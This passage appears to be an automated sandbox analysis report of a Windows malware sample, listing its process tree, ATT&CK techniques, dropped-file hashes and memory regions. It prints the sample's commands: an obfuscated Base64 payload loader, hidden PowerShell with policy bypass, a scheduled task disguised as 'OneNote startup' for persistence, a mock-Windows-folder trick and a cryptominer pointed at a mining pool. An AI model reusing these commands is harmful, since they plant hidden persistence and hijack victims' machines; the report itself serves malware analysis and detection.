([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:3168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
4⤵
PID:512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\VCRedists')
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG_CPU -p x --cpu-max-threads-hint=50
4⤵
- Suspicious use of FindShellTrayWindow
PID:4108

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

File and Directory Discovery

T1083

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fa4ccbdfcb11c24ee92cce60311b2ed0

SHA1
e39c80b60e4b10037e510e833c94a2c219f7b0fd

SHA256
c523d18014d2d23f267641c13645aac36ed557f7773667ac44f061145e9f4f27

SHA512
22174e30ae9a56abcb797025cde96b70b311e7b9a90f5004de2d4be998c6c12977e551c58d8702bff3190a80f6aef9f92e847a9f8efac18b7a2ce4bd8e7f6cf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a0cb52ecad11458881d7edfc499c4053

SHA1
eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b

SHA256
c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b

SHA512
8a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
90b2459a6432f59ed2d225f7e4b77d96

SHA1
e9d41ca7105a28e987fadfd188438e08f1bde664

SHA256
3f9daee99f25633b64f3484dce77abf499c125d4072047368e933bf50d0b016b

SHA512
41f256166d406f2299f9cf8daf4ab08b0cda00782b15ad951c1f123a315147b9cb7c27ea963f4619ac891a6b77a99c4f5a4a4f5dd8c852f059ddd4013f6b59b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\MLANG.dll
Filesize
122KB

MD5
0b62c554572e9d2dfc51b6367c34700f

SHA1
1a41693552101c650aeeffe9dc9f1c7f7553dd7b

SHA256
b05a80ef8ad197ee36620655100e1fd4111ec946a9f012970da4c61d8da43ded

SHA512
765e2f686a74804063b1face147a2dfd4cac85fb8273b5b0ccbd7606e46fce9865d5bbeeca40af31a8b584dc0bba1ebc0ff3fa8c1993da08a4b09cd15a394ce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\VCRedist.bat
Filesize
413KB

MD5
1dfa0a2035388952e2b5c841dfc5f595

SHA1
636cc89f8d661960324de4047f4281a6eb8ca37b

SHA256
db117c7378bc5ac4c6acc296d07ce799d1bb4a12fac593c16c34e7ccc9d4fa6c

SHA512
6b1e7579c432743e4b7927835f02401341ce9fbc26f8f7edecbe95a1bb00c139ae392543d5603fe042c0b76beb1269a6168f1bb72ab6407ca1c505677059a320

Download Submit
C:\Users\Admin\AppData\Local\Temp\VCRedists.bat
Filesize
972KB

MD5
c86637644022012aaa6bbfbf8947f3a6

SHA1
94adf42f7d2a48be6ee33900596f918fc4d6c36d

SHA256
1253081538d614b09657b82e17be73f15a63bef1ac1c5d5383624954e0776f41

SHA512
df80a94d7fcc1276b60849320ca530b6a5e11f4bfe7aaf816975d6aa0412c046c44df22e2d8914bd26076e698c70ce81adf1cb5c535ba76620b216c1955173e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ixp3rjd.wdw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows \System32\ComputerDefaults.exe
Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
memory/1980-140-0x000001B454820000-0x000001B454876000-memory.dmp

Filesize
344KB

Download
memory/1980-26-0x000001B4541A0000-0x000001B454216000-memory.dmp

Filesize
472KB

Download
memory/1980-34-0x000001B4544E0000-0x000001B454598000-memory.dmp

Filesize
736KB

Download
memory/1980-32-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/1980-31-0x000001B451B20000-0x000001B451B30000-memory.dmp

Filesize
64KB

Download
memory/1980-141-0x000001B454880000-0x000001B4548CC000-memory.dmp

Filesize
304KB

Download
memory/1980-139-0x000001B4546E0000-0x000001B4547E4000-memory.dmp

Filesize
1.0MB

Download
memory/1980-138-0x000001B454640000-0x000001B4546E2000-memory.dmp

Filesize
648KB

Download
memory/1980-33-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp

Filesize
760KB

Download
memory/3248-25-0x000001BFCCF10000-0x000001BFCCF54000-memory.dmp

Filesize
272KB

Download
memory/3248-29-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp

Filesize
760KB

Download
memory/3248-27-0x000001BFCCA20000-0x000001BFCCA30000-memory.dmp

Filesize
64KB

Download
memory/3248-28-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/3248-30-0x000001BFCCEC0000-0x000001BFCCF0E000-memory.dmp

Filesize
312KB

Download
memory/3248-6-0x000001BFCC9F0000-0x000001BFCCA12000-memory.dmp

Filesize
136KB

Download
memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmp

Filesize
96KB

Download
memory/3264-83-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp

Filesize
760KB

Download
memory/3264-82-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

Filesize
2.0MB

Download
memory/4108-144-0x0000026C7FE70000-0x0000026C7FE90000-memory.dmp

Filesize
128KB

Download
memory/4108-142-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-143-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-148-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-149-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-147-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-145-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-146-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-150-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4108-151-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download